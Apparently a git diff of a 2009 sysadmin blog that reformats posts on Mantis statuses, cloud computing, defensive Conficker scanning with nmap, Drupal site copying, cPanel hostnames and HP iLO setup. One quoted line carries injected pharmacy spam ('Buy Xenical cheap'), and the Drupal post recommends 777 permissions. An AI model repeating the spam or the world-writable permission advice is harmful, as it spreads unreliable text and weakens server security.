+```
+$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
+80:resolved,85:GTG,90:closed';
+```
Assign a color for your bug status, example:
-`$g_status_colors['GTG'] = '#cceedd';`
+```
+$g_status_colors['GTG'] = '#cceedd';
+```
**Changes to custom_strings_inc.php:**
Create definition for your new status:
-`$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
+```
+$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
80:resolved,85:GTG,90:closed';
$s_GTG_bug_button = "GTG Issue";
$s_GTG_bug_title = "Set Issue to GTG";
-$s_email_notification_title_for_status_bug_GTG = "The following issue is GTG.";`
+$s_email_notification_title_for_status_bug_GTG = "The following issue is GTG.";
+```
That's all and you should see your new status.
-
-
View
10 source/_posts/2009-03-30-rush-to-stake-a-claim-in-the-cloud.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-03-30 00:08:30'
layout: post
@@ -17,17 +18,14 @@ That's when I thought - wow - this term really has penetrated into the mainstrea
As if on cue the next morning the Wall Street Journal:  [The Internet Industry Is on a Cloud -- Whatever That May Mean](http://online.wsj.com/article/SB123802623665542725.html) by Geoffrey A. Fowler and Ben Worthen landed on my lap.  Ok, it landed on my porch, and then I read it.
-![](http://s.wsj.net/public/resources/images/HC-GN554_Questi_BV_20090325171834.gif) I hope the Journal doesnt mind if I borrow their image of the cloud - very fitting for the article.  Basically its a tale of marketers trying to - or should I say - fighting for integration of the term into its product jargon.  
+![](http://s.wsj.net/public/resources/images/HC-GN554_Questi_BV_20090325171834.gif)
-Some of my favorite quotes from the piece are bleow.  I recommended the quick article as a nice distraction, but don't expect to come away being clear on the term "Cloud Computing".  
+I hope the Journal doesnt mind if I borrow their image of the cloud - very fitting for the article.  Basically its a tale of marketers trying to - or should I say - fighting for integration of the term into its product jargon.  
+Some of my favorite quotes from the piece are bleow.  I recommended the quick article as a nice distraction, but don't expect to come away being clear on the term "Cloud Computing".  
> "I have no idea what anyone is talking about," said [Oracle](http://online.wsj.com/public/quotes/main.html?type=djn&symbol=orcl) Corp. Chief Executive Larry Ellison, when talking about cloud computing at a financial analyst conference in September. "It's really just complete gibberish. What is it?" He added: "When is this idiocy going to stop?"
-
In the full fiscal year since Salesforce started using the term cloud computing, its revenue grew 44%. "I think it's the most powerful ">Buy Xenical cheap term in the industry," 
-
[Dell](http://online.wsj.com/public/quotes/main.html?type=djn&symbol=dell) Inc. applied to trademark the term cloud computing last year. The U.S. Patent and Trademark Office initially approved the application. But it changed its mind in response to an outburst of criticism, including from bloggers incensed that the term could fall under one company's control.
View
5 source/_posts/2009-03-31-scanning-for-conficker-with-nmap.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-03-31 00:31:23'
layout: post
@@ -16,7 +17,9 @@ While [Conficker](https://www.honeynet.org/files/KYE-Conficker.pdf) is not a new
Why just in time you may ask? Well because the worm is said to become active on April 1st. It is unknown if all infected PC will be used for bad deeds. I'm sure no one needs a reminder of the SQL Slammer worm of 2003/2004 where 5 of the 11 root DNS servers went down, ATM's where knocked offline due to massive DDOS attacks. I understand the symbolism of April 1st being April fools day, but as the doctor always says: It's far easier to prevent then to treat.
Using the [latest development version of Nmap](http://download.insecure.org/nmap-dist/nmap-4.85BETA4-1.i386.rpm) one would run a command to scan systems for Conficker signature.
-`nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]`
+```
+nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]
+```
Or by updating your [Nessus](http://www.nessus.org) server's plugins `nessus-update-plugins` create and run a scan that includes [plugin id #36036](http://www.nessus.org/plugins/index.php?view=single&id=36036) (if you don't pay for Nessus Professional feed you will have to wait 7 days to receive the plugin)
View
1 source/_posts/2009-04-02-big-brother-can-pull-the-plug.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-04-02 03:21:09'
layout: post
View
12 source/_posts/2009-04-03-drupal-howto-duplicate-copy-drupal-site.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-04-03 04:48:11'
layout: post
@@ -20,14 +21,12 @@ This post cover the steps to copy, transfer, or duplicate a Drupal site to new d
**Database:**
-
1.) Create an sql dump of your source database (use mysqldump)
2.) Update references to domain/url and path or home directory (you can user perl/sed commands)
3.) Import to your destination database (using mysql).
**Files/Codes:**
-
1.) Copy all files from your source directory or account to the destination site.
2.) Update references to database name, database user, database password, home directory of drupal installation, and domain name or url.
3.) Update permission and ownership of files and directories, like the sites/default/files to 777.
@@ -36,15 +35,8 @@ This post cover the steps to copy, transfer, or duplicate a Drupal site to new d
**Shell / Bash Scripts:**
-
1.)  Copy Drupal Site with CiviCRM.  [**Download here!**](http://linuxsysadminblog.com/images/2009/04/copy_drupal_with_civicrm.sh)
-
-
-
2.)  Copy Drupal Site without CiviCRM.  [**Download here!**](http://linuxsysadminblog.com/images/2009/04/copy_drupal_without_civicrm.sh)
-
-
-**Note: **You can modify these scripts to work with sub-domains.** **Let me know if you have questions or suggestions or if you need help.**
-**
+**Note:** You can modify these scripts to work with sub-domains. Let me know if you have questions or suggestions or if you need help.
View
11 source/_posts/2009-04-05-change-hostname-of-cpanel-server.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-04-05 07:19:16'
layout: post
@@ -13,12 +14,10 @@ categories:
This task is very simple and can be done in two steps:
1.)  Login as root and change your server hostname:
-
-
-`_**hostname newhos.name.tld**_`
-
-
+```
+hostname newhos.name.tld
+```
**Note:** Don't forget to create an A entry for your new hostname, otherwise you will get a popup message during WHM login.
-2.)  Issue `_**/usr/local/cpanel/cpkeyclt**_` to update your Cpanel License Key, otherwise you will get Invalid License when you login to WHM/Cpanel interface.
+2.)  Issue `/usr/local/cpanel/cpkeyclt` to update your Cpanel License Key, otherwise you will get Invalid License when you login to WHM/Cpanel interface.
View
2 source/_posts/2009-04-05-linux-devices-at-ctia.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: andrew-kucharski
date: '2009-04-05 22:31:26'
layout: post
@@ -12,4 +13,3 @@ categories:
---
This interesting interview with George Smith from [Xendros](http://www.xandros.com/products/oem/) OEM Solutions talk about Linux OS (Debian based) installed in conjunction with  [Qualcom Snapdragon](http://www.qctconnect.com/products/snapdragon.html) platoform is making long battery small internet browsing devices powerful.  This linux combo is be a huge threat to the Microsoft Intel family in the area of mobile computing.
-
View
42 source/_posts/2009-04-07-hp-ilo-remote-managment-online-configuration-part-1.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-04-07 16:54:28'
layout: post
@@ -20,26 +21,32 @@ tags:
Many mainstream oem server iron manufacturers (dell, supermicro, sun, ibm) offer remote management options. HP's variant is called iLO or **Integrated Lights Out **and is standard on 3oo/500/Blade line of servers. Newer generation (G5 and up) servers come with iLO 2 which offers hardware video acceleration and network encryption.  Normally iLO is setup before booting the server as ip address/user assignments need to accommodated. This can be done remotely as well with minimal pain. This guide assumes the server is HP dl360 G5 running rhel5 /centos 5 64 and you have root access to the server.  This guide would apply to other HP servers that support [iLO](http://h18000.www1.hp.com/products/servers/management/ilo/) / [iLO2](http://h18013.www1.hp.com/products/servers/management/iloadv2/index.html).
1. [Download](http://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&cc=us&prodTypeId=15351&prodSeriesId=1121486&prodNameId=3288144&swEnvOID=4004&swLang=8&mode=2&taskId=135&swItem=MTX-4142b198b9cb475f99658a7caf) and install latest (8.2.0-236) iLO kernel module.
-
-`rpm -ivh hp-ilo-8.2.0-236.rhel5.x86_64.rpm
-service hp-ilo start`
+```
+rpm -ivh hp-ilo-8.2.0-236.rhel5.x86_64.rpm
+service hp-ilo start
+```
check that the module loaded properly
-
-`[root@server ~]$ lsmod
+```
+[root@server ~]$ lsmod
Module                  Size  Used by
-hpilo                  43280  0`
+hpilo                  43280  0
+```
2. [Download](http://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1285463034/v51280/CP010302.scexe) and install latest (1.70 B) iLO firmware.
+```
+[root@server ~]$ sh CP010302.scexe
+```
-`[root@server ~]$ sh CP010302.scexe`
-
-`FLASH_iLO2 v1.10 for Linux (Jan 12 2009)
+```
+FLASH_iLO2 v1.10 for Linux (Jan 12 2009)
Copyright 2009 Hewlett-Packard Development Company, L.P.
Firmware image: ilo2_170.bin
Current iLO 2 firmware version  1.29; Serial number ILOUSM1234567
-`
-`Component XML file: CP010302.xml
+```
+
+```
+Component XML file: CP010302.xml
CP010302.xml reports firmware version 1.70
This operation will update the firmware on the
iLO 2 in this server with version 1.70.
@@ -50,15 +57,18 @@ Committing to flash part...
******** DO NOT INTERRUPT! ********
Flashing completed!
Attempting to reset device.
-Succeeded.`
+Succeeded.
+```
3. [Download](http://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&cc=us&prodTypeId=15351&prodSeriesId=1121486&prodNameId=3288144&swEnvOID=4004&swLang=8&mode=2&taskId=135&swItem=MTX-5292ccda1fef4040b1f14cf85d) and install latest (8.2.0-285) hp-OpenIPMI device driver.
-
-`rpm -ivh 8.2.0-285.rhel5.x86_64.rpm`
+```
+rpm -ivh 8.2.0-285.rhel5.x86_64.rpm
+```
4. [Download](http://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&cc=us&prodTypeId=15351&prodSeriesId=1121486&prodNameId=3288144&swEnvOID=4004&swLang=8&mode=2&taskId=135&swItem=MTX-9994deee7e854c48934baeb2e5) and install latest (1.9.0-3) HP Lights-Out Online Configuration utility.
-
-`rpm -ivh hponcfg-1.9.0-3.noarch.rpm`
+```
+rpm -ivh hponcfg-1.9.0-3.noarch.rpm
+```
5. **Optional** [Download](http://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&cc=us&prodTypeId=15351&prodSeriesId=1121486&prodNameId=3288144&swEnvOID=4004&swLang=8&mode=2&taskId=135&swItem=MTX-6843fb2d2e524c9690b30b6c30) latest (2.10) SmartStart Scripting Toolkit to your pc.
View
11 ...-data-centers-and-presentation-video-from-the-google-efficent-data-center-summit.markdown
@@ -1,5 +1,6 @@
---